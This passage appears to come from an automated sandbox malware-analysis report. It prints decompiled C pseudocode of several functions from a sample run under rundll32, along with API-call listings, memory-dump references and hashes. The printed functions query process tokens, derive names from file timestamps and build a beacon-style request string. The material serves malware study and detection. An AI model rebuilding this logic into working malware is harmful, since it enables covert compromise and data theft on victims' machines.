				_t28 = _t2;
				_t34 = E043558BE(_t2);
				if(_t34 != 0) {
					_t30 = E043558BE(_t28);
					if(_t30 == 0) {
						E0435147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0435A8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0435A8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x04356b6e
                                          0x04356b78
                                          0x04356b7a
                                          0x04356b80
                                          0x04356b80
                                          0x04356b89
                                          0x04356b8d
                                          0x04356b99
                                          0x04356b9d
                                          0x04356c11
                                          0x04356b9f
                                          0x04356b9f
                                          0x04356ba3
                                          0x04356ba8
                                          0x04356bad
                                          0x04356bc7
                                          0x04356bb6
                                          0x04356bb6
                                          0x04356bba
                                          0x04356bbd
                                          0x04356bc2
                                          0x04356bc2
                                          0x04356bcc
                                          0x04356bf4
                                          0x04356bfa
                                          0x04356bfd
                                          0x04356bce
                                          0x04356bd0
                                          0x04356bd8
                                          0x04356be3
                                          0x04356be8
                                          0x04356be8
                                          0x04356c04
                                          0x04356c0b
                                          0x04356c0c
                                          0x04356c0c
                                          0x04356b9d
                                          0x04356c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0435A006,?,?,?,?,00000102,043566AF,?,?,00000000), ref: 04356B7A
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                            • Part of subcall function 0435A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04356BA8,00000000,00000001,00000001,?,?,0435A006,?,?,?,?,00000102), ref: 0435A8E0
                                            • Part of subcall function 0435A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0435A006,?,?,?,?,00000102,043566AF,?,?,00000000,00000000), ref: 0435A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0435A006,?,?,?,?,00000102,043566AF,?), ref: 04356BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04356BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04356BF4
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 411a39a76719e9fa5e9ef66678c7302f0b71eb0d2da46c436d33bf09056fabc0
                                          • Instruction ID: 8227fc0c148a7eec0c869edc0ce8f1fc9618b2bb01ef2aca622e7fd8ce1ca59e
                                          • Opcode Fuzzy Hash: 411a39a76719e9fa5e9ef66678c7302f0b71eb0d2da46c436d33bf09056fabc0
                                          • Instruction Fuzzy Hash: 9221D272A00255BFDB125FB5C845EAE7FBCEF05394F45A050FD089B221EB35EA4097A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04355FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04355FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E043558BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x04355fe0
                                          0x04355fe4
                                          0x04355fee
                                          0x04355ff3
                                          0x04355ff8
                                          0x04355ffa
                                          0x04356002
                                          0x04356007
                                          0x04356015
                                          0x0435601a
                                          0x04356024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0687937C,?,0435694E,004F0053,0687937C,?,?,?,?,?,?,04359C10), ref: 04355FDB
                                          • lstrlenW.KERNEL32(0435694E,?,0435694E,004F0053,0687937C,?,?,?,?,?,?,04359C10), ref: 04355FE2
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0435694E,004F0053,0687937C,?,?,?,?,?,?,04359C10), ref: 04356002
                                          • memcpy.NTDLL(751469A0,0435694E,00000002,00000000,004F0053,751469A0,?,?,0435694E,004F0053,0687937C), ref: 04356015
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: aeda8b3d01aed6d326c80c60bf56b3f5661713d188e339163f5cd04acf07c265
                                          • Instruction ID: b2c29353c8b53d8139bca4383e5241251b99a1064a8543204a42a1f000dc073d
                                          • Opcode Fuzzy Hash: aeda8b3d01aed6d326c80c60bf56b3f5661713d188e339163f5cd04acf07c265
                                          • Instruction Fuzzy Hash: FCF03C72900118BB9B11DFA8CC85C9F7BACEF082587054062AD08D7211E635EA109BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04359DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04355335,616D692F,00000000), ref: 04359DFB
                                          • lstrlen.KERNEL32(?), ref: 04359E03
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04359E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04359E25
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 0618a5e5eac659fb3e84d917877249235efa9751f9da58d91b2369075c261611
                                          • Instruction ID: 10199afa654ce053a57db7beef83ca3ac3647f9f5a42474b78ec55fd0330fbf9
                                          • Opcode Fuzzy Hash: 0618a5e5eac659fb3e84d917877249235efa9751f9da58d91b2369075c261611
                                          • Instruction Fuzzy Hash: 76E09A33805721AB8B626BA4AC08C9FBBADFF8D320B046816FA1083124CB35DC10CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 6708 Parent PID: 2880 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 067732BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E067732BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x677d2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x677d238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x677d2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x677d238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x677d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x677d2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x677d2a4; // 0x4ca5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x677e7e8; // 0x73797325
				_t83 = E067777E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x677d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x677d2a4; // 0x4ca5a8
				_t16 = _t93 + 0x677e809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x067732c3
                                          0x067732c9
                                          0x067732cb
                                          0x067732e5
                                          0x067732e7
                                          0x067732ec
                                          0x06773561
                                          0x06773568
                                          0x06773568
                                          0x067732f2
                                          0x06773307
                                          0x06773309
                                          0x0677330b
                                          0x06773310
                                          0x06773551
                                          0x0677355b
                                          0x00000000
                                          0x0677355b
                                          0x06773316
                                          0x06773321
                                          0x06773326
                                          0x0677332b
                                          0x0677332e
                                          0x06773335
                                          0x0677333a
                                          0x0677333f
                                          0x06773541
                                          0x0677354b
                                          0x00000000
                                          0x0677354b
                                          0x06773355
                                          0x06773359
                                          0x0677335c
                                          0x0677335f
                                          0x06773365
                                          0x0677336a
                                          0x06773373
                                          0x06773379
                                          0x06773383
                                          0x0677338a
                                          0x0677338a
                                          0x0677339c
                                          0x067733a7
                                          0x067733b5
                                          0x067733ba
                                          0x067733bf
                                          0x067733c2
                                          0x067733c7
                                          0x067733d1
                                          0x067733d4
                                          0x067733d7
                                          0x067733ed
                                          0x067733ef
                                          0x067733f4
                                          0x0677353f
                                          0x00000000
                                          0x0677353f
                                          0x0677340b
                                          0x0677345c
                                          0x0677341f
                                          0x06773427
                                          0x0677342c
                                          0x0677343a
                                          0x06773443
                                          0x0677344c
                                          0x0677344c
                                          0x0677345a
                                          0x0677345a
                                          0x06773460
                                          0x06773464
                                          0x06773464
                                          0x0677346a
                                          0x00000000
                                          0x00000000
                                          0x0677346c
                                          0x06773472
                                          0x06773519
                                          0x0677351c
                                          0x06773529
                                          0x06773529
                                          0x0677352d
                                          0x00000000
                                          0x00000000
                                          0x06773522
                                          0x06773526
                                          0x06773526
                                          0x06773528
                                          0x06773528
                                          0x06773532
                                          0x06773539
                                          0x0677353b
                                          0x00000000
                                          0x0677353b
                                          0x06773478
                                          0x0677347a
                                          0x0677347a
                                          0x0677348d
                                          0x06773493
                                          0x0677349e
                                          0x067734a0
                                          0x067734a4
                                          0x067734a6
                                          0x067734a6
                                          0x067734ab
                                          0x067734ad
                                          0x067734ad
                                          0x067734ab
                                          0x067734b2
                                          0x067734b6
                                          0x067734b6
                                          0x067734c6
                                          0x067734cb
                                          0x067734ce
                                          0x067734ce
                                          0x067734d1
                                          0x067734db
                                          0x067734e3
                                          0x067734e8
                                          0x067734f6
                                          0x067734f6
                                          0x0677350a
                                          0x0677350e
                                          0x0677350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 067732E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 06773307
                                          • memset.NTDLL ref: 06773321
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0677333A,73797325), ref: 067777F7
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 06777811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0677335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 06773373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0677338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 06773396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 067733D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 067733ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 0677340B
                                          • FindNextFileA.KERNELBASE(0677207E,?), ref: 0677341F
                                          • FindClose.KERNEL32(0677207E), ref: 0677342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 06773438
                                          • CompareFileTime.KERNEL32(?,?), ref: 0677345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0677348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 067734C6
                                          • FindNextFileA.KERNELBASE(0677207E,?), ref: 067734DB
                                          • FindClose.KERNEL32(0677207E), ref: 067734E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 067734F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 06773504
                                          • FindClose.KERNEL32(0677207E), ref: 06773539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 0677354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 0677355B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 649b16a0b7ce7a318e12851e105838686ef1ec5b85de54eb8f0d4103486c1f2b
                                          • Instruction ID: 1f0aedad0599d51dbb1c7adfa88bf60f0a4925a98cba87fd17ef6a07e806d184
                                          • Opcode Fuzzy Hash: 649b16a0b7ce7a318e12851e105838686ef1ec5b85de54eb8f0d4103486c1f2b
                                          • Instruction Fuzzy Hash: 64815BB1D00219AFDF61DFA4DC84AFEBBB9FF48310F14846AE605E6250D7319A45DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067771B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E067771B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E067758BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0677147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x067771c6
                                          0x067771c7
                                          0x067771c8
                                          0x067771c9
                                          0x067771ca
                                          0x067771ce
                                          0x067771d5
                                          0x067771e4
                                          0x067771e7
                                          0x067771ea
                                          0x067771f1
                                          0x067771f4
                                          0x067771f7
                                          0x067771fa
                                          0x067771fd
                                          0x06777208
                                          0x0677720a
                                          0x06777213
                                          0x0677721b
                                          0x0677721d
                                          0x0677722f
                                          0x06777239
                                          0x0677723d
                                          0x0677724c
                                          0x06777250
                                          0x06777259
                                          0x06777261
                                          0x06777261
                                          0x06777263
                                          0x06777263
                                          0x0677726b
                                          0x06777271
                                          0x06777275
                                          0x06777275
                                          0x06777280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 06777200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 06777213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0677722F
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0677724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 06777259
                                          • NtClose.NTDLL(?), ref: 0677726B
                                          • NtClose.NTDLL(00000000), ref: 06777275
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 782db14ab2c4194128e1194a9c86b8d1044118d2e07c0cbc300808558b4b4660
                                          • Instruction ID: 901c69390e71ab24b3b94ac2b7f3bfed5fab3f77b4275e166dc2b55e2deb0036
                                          • Opcode Fuzzy Hash: 782db14ab2c4194128e1194a9c86b8d1044118d2e07c0cbc300808558b4b4660
                                          • Instruction Fuzzy Hash: DA21E5B2900218BFEF41DF95CD899DEBFBDEB18740F108026FA10E6154D7719A44DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06771754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E06771754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x677d018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0x677d014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x677d010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x677d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x677d2a4; // 0x4ca5a8
				_t3 = _t65 + 0x677e633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x677d02c,  *0x677d004, _t60);
				_t68 = E067757AB();
				_t69 =  *0x677d2a4; // 0x4ca5a8
				_t4 = _t69 + 0x677e673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E067773E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x677d2a4; // 0x4ca5a8
					_t7 = _t130 + 0x677e8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x677d238, 0, _v8);
				}
				_t74 = E0677614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x677d2a4; // 0x4ca5a8
					_t11 = _t125 + 0x677e8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x677d238, 0, _v8);
				}
				_t150 =  *0x677d324; // 0x6c495b0
				_t76 = E0677757B(0x677d00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					HeapFree( *0x677d238, _t156, _a16);
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x677d238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x677d238, _t156, _v20);
						goto L26;
					}
					E0677749F(GetTickCount());
					_t83 =  *0x677d324; // 0x6c495b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x677d324; // 0x6c495b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x677d324; // 0x6c495b0
					_t152 = E06774D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0x677d238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0x677c294);
					_t95 =  *0x677d2a4; // 0x4ca5a8
					_push(_t152);
					_t18 = _t95 + 0x677e252; // 0x616d692f
					_t97 = E06779DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0x677d238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E0677A5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E06776106();
						L22:
						HeapFree( *0x677d238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E06772F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E0677A060(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E0677147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E06771600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0677147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}























































                                          0x06771754
                                          0x06771754
                                          0x06771754
                                          0x0677175d
                                          0x06771766
                                          0x06771768
                                          0x06771768
                                          0x06771775
                                          0x06771780
                                          0x06771783
                                          0x06771788
                                          0x06771791
                                          0x06771794
                                          0x06771799
                                          0x0677179c
                                          0x067717a1
                                          0x067717a4
                                          0x067717b0
                                          0x067717bd
                                          0x067717bf
                                          0x067717c5
                                          0x067717ca
                                          0x067717d5
                                          0x067717d7
                                          0x067717da
                                          0x067717dc
                                          0x067717e1
                                          0x067717e7
                                          0x067717ec
                                          0x067717ef
                                          0x067717f4
                                          0x06771801
                                          0x06771803
                                          0x06771809
                                          0x06771813
                                          0x06771813
                                          0x06771815
                                          0x0677181a
                                          0x0677181f
                                          0x06771822
                                          0x06771827
                                          0x06771834
                                          0x06771836
                                          0x06771844
                                          0x06771844
                                          0x06771846
                                          0x06771854
